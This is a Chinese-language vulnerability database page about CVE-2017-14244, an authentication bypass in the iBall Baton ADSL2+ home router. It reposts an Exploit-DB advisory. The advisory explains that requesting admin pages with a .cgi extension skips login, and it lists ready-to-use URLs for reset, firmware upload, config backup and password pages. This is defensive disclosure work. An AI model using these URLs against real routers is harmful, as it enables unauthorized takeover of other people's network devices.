iBall Baton ADSL2+ Home Router 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124250 漏洞类型 授权问题
发布时间 2017-09-18 更新时间 2019-10-23
CVE编号 CVE-2017-14244 CNNVD-ID CNNVD-201709-268
漏洞平台 Hardware CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/42740
https://cxsecurity.com/issue/WLB-2017090140
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201709-268
|漏洞详情
iBall Baton ADSL2+ Home Router是印度iBall公司的一款路由器。 iBall Baton ADSL2+ Home Router FW_iB-LR7011A_1.0.2版本中存在身份验证绕过漏洞。攻击者可借助通过构建带有.cgi扩展的URL利用该漏洞登录管理面板。
|漏洞EXP
# Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability
# CVE: CVE-2017-14244
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746
# Firmware version: FW_iB-LR7011A_1.0.2
# Vendor Homepage: https://www.iball.co.in
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass


Vulnerability Details
======================
iBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc.

How to reproduce
===================
Suppose 192.168.1.1 is the router IP and one of the valid page in router is is  http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi

Example URLs:
* http://192.168.1.1/info.cgi – Status and details
* http://192.168.1.1/upload.cgi – Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – Router reset
* http://192.168.1.1/password.cgi – password settings

POC
=========
* https://www.youtube.com/watch?v=_SvrwCSdn54


 -----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
 Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel
|参考资料

来源:MISC
链接:https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass